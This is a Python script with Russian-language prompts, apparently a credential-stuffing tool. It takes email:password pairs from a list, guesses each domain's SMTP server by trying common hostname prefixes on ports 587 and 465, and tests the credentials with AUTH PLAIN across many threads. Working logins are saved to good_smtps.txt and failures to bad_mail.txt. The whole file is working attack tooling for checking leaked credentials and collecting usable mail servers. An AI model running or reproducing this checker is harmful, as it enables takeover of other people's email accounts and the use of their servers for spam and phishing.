#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import ssl
import sys
import time
import random
import base64
import smtplib
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
from loguru import logger
from datetime import datetime
import traceback
import socket
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
GREY = "\033[90m"
RED = "\033[91m"
GREEN = "\033[92m"
GREENYELOOW = '\033[33m'
YELLOW = "\033[93m"
ORANGE = '\033[31m'
BLUE = "\033[94m"
VIOLET = '\033[95m'
CYAN = '\033[96m'
WHITE = "\033[37m"
def formatter(record):
base_format = "{time:YYYY-MM-DD at HH:mm:ss} || {level} || {message}\n{extra[error_only]}"
exc = record["exception"]
if exc is None:
record["extra"]["error_only"] = ""
else:
type_, value, _ = exc
error_only = "".join(traceback.format_exception_only(type_, value))
record["extra"]["error_only"] = error_only
return base_format
logger.remove()
logger.add(sys.stderr, format=formatter, level="INFO")
logger.add(
"checker.log",
level="WARNING",
format=formatter,
rotation="5 MB",
encoding='utf8',
diagnose=True,
backtrace=True,
)
PREFIX_LST = [
'',
'smtp.',
'mail.',
'smtp2.',
'pop.',
'pop3.',
'smtp-mail.',
'smtpout.'
]
PORT_LST = ['587', '465']
mail_list_file_path = f"{os.getcwd()}\\emails.txt"
def read_file(file_path: str) -> list:
with open(file_path, 'r') as fr:
array = fr.read().split('\n')
return array
def overwriting_file_without_empty_lines(file_path: str, array: list):
with open(file_path, 'w') as fw:
array = list(filter(None, array))
for index, line in enumerate(array, 1):
if index == len(array):
fw.write(line)
else:
fw.write(f'{line}\n')
def deleting_empty_lines_in_file(file_path: str) -> None:
array = read_file(file_path)
overwriting_file_without_empty_lines(file_path, array)
def get_not_empty_list(file_path: str) -> list or None:
if not os.stat(file_path).st_size:
print('{} is empty'.format(file_path))
os._exit(1)
else:
deleting_empty_lines_in_file(file_path)
array = read_file(file_path)
return array
def add_bad(mail: str, password: str) -> None:
with open('bad_mail.txt', 'a') as fw:
fw.write(f'{mail}:{password}\n')
@logger.catch
def check_one_email(data: tuple) -> None:
index, prompt = data[0], data[1]
try:
if ';' in prompt:
if ':' not in prompt:
prompt = prompt.replace(';', ':', 1)
mail = prompt.split(':')[0]
password = prompt.split(':')[1]
print('{0}[{1}{2}{0}] {1}Обработка->{3} {4}'.format(
CYAN, GREY, index, WHITE, prompt
))
userhost = mail.split('@')[-1]
base64_str = (f"\x00{mail}\x00{password}").encode()
base64_str = base64.b64encode(base64_str)
authMsg = "AUTH PLAIN ".encode() + base64_str + "\r\n".encode()
isGood = False
for port in PORT_LST:
for prefix in PREFIX_LST:
host = f'{prefix}{userhost}'
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(5.0)
try:
sock.connect((host, int(port)))
sock.setblocking(0) # неблокирующий ввод-вывод
sock.settimeout(None)
if port == '465':
sock = ssl.wrap_socket(sock)
data = sock.recv(1024)
if data[0:3].decode() != '220':
continue
sock.send(b'EHLO ADMIN\r\n')
res1 = sock.recv(1024)
if res1[0:3].decode() != '250':
continue
sock.send(authMsg)
res2 = sock.recv(1024)
if res2[0:3].decode() != '235':
continue
smtp_line = "{}|{}|{}|{}".format(
host, port, mail, password
)
print(
'{}[+] {}{}'.format(
GREEN, smtp_line, ENDC
)
)
isGood = True
with open('good_smtps.txt', 'a') as fw:
fw.write(f'{smtp_line}\n')
break
except OSError:
logger.debug(f"OSError {host}:{port}")
pass
except ConnectionRefusedError:
logger.debug(f"ConnectionRefusedError {host}:{port}")
break
except ConnectionResetError:
logger.debug(f"ConnectionResetError {host}:{port}")
break
except Exception as ex:
logger.error(f"{host}:{port}\n{ex}")
continue
if isGood:
break
if not isGood:
add_bad(mail, password)
except Exception as ex:
logger.exception(f"{ex} >>> {prompt}")
def get_dataset(mail_lst: list) -> list:
dataset = []
for index, mail in enumerate(mail_lst, 1):
dataset.append((index, mail))
return dataset
@logger.catch
def main(dataset: list):
with ThreadPoolExecutor(S_THREADS) as executor:
results = [
executor.submit(check_one_email, data) for data in dataset
]
for future in as_completed(results):
try:
future.result()
except Exception as ex:
logger.exception("Error in main foo {}", ex)
if __name__ == '__main__':
try:
with open('checker.log', 'a+', encoding='utf-8') as fw:
fw.write("-------------------------------------------\n")
fw.write(f"[ START CHECK ] {datetime.now()}\n")
fw.write("-------------------------------------------\n")
separator = '-' * 51
os.system('cls')
print(f'{GREENYELOOW}+{separator}+')
mail_lst = get_not_empty_list(mail_list_file_path)
with open('good_smtps.txt', 'w'):
pass
while True:
print(f'{GREENYELOOW}+{separator}+')
S_THREADS = int(input(f'{GREENYELOOW}[!] Выберите количество потоков(min=10, max=100):{ENDC} '))
if isinstance(S_THREADS, int):
break
print(f'{GREENYELOOW}+{separator}+{WHITE}')
print(
f'{WHITE}[!] В обработке {len(mail_lst)} emails{ENDC}'
)
print()
print()
dataset = get_dataset(mail_lst)
res = threading.Thread(
target=main,
args=(dataset,),
daemon=True,
)
res.start()
res.join()
# print(res.is_alive())
print(f"\n{GREEN}END{WHITE}")
os._exit(1)
except KeyboardInterrupt:
logger.info('Скрипт остановлен')
os._exit(1)
except Exception as ex:
logger.exception(ex)